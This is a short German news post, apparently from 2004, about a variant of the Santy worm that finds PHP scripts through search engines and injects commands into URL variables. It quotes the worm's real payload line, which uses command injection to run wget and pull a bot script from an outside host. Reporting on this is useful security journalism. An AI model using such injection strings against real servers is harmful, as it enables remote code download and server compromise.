Wurm attackiert PHP-Skripte
Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700
2004-12-26 00:00:00 2004-12-26 00:00:00 admin
Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:
http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;
Ãberprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.
hiese.de
Erfahrungen
Hier Kannst Du einen Kommentar verfassen
Verwandte Beiträge
PostgreSQL Beta 2 verfügbar
Das Datenbanksystem PostgreSQL ist in in der Version 8.4 Beta 2 erschienen. ...
Autor :
admin
Kategorie:
Dies und Das
Pentium 4-Bug
Laut ZDNet kommt es zu Probleme beim der Wiedergabe von DVDs. Unter bestimmten Bedingungen hängt sich der komplette PCI-Bus aus. Dieses soll zwar nur ein kleiner Fehler sein, aber auch kleine Abstürze ist ärgerlich :) ...
Autor :
admin
Kategorie:
Software & Web-Development
GIF-Patent bald vom Tisch
Nur noch wenige Tage, dann ist das zu zweifelhaftem Ruhm gelangte LZW-Patent der Firma Unisys endgültig Geschichte. Schon vor einem Jahr lief das US-Patent ab, heute folgt das europäische (EP 129,439 A1 ), übermorgen das japanische und am 7. Juli das kana ...
Autor :
admin
Kategorie:
Software & Web-Development
Der Tag des schlechten Codes: Developers Shame Day
Am Morgigen Mittwoch ruft Cem Derin zum "Developers Shame Day" auf. Ein Tag, an dem jeder alten Quellcode aus der eigenen Feder rauskramt, und zeigt, dass man auch selbst mal klein Angefangen hat. ...
Autor :
unset
Kategorie:
Software & Web-Development
Düsseldorf: Ein Quadratkilometer Rheinpromenade mit WLAN
Ab 1. Juli wird das Düsseldorfer Altstadtufer und der MedienHafen um eine Attraktion reicher: In Zusammenarbeit mit der Stadt Düsseldorf ermöglicht ISIS Multimedia Net die Nutzung eines WLAN-Internetzugangs, im kommenden Sommer 2003 ist dies sogar kostenl ...
Autor :
admin
Kategorie:
Software & Web-Development
Neue Ausgabe von PHP Solutions – 5/2004 (6)
Die neue Ausgabe des Magayins ist ab September im Zeitschriftenhandel erhältlich. - Code-Dokumentierung mit phpDocumentor - Verwendung von Xindice mit PHP - Übertragen von Daten zwischen MySQL und XML, CSV bzw. HTML - Verwendung der PHP-Erweiterung ...
Autor :
admin
Kategorie:
Software & Web-Development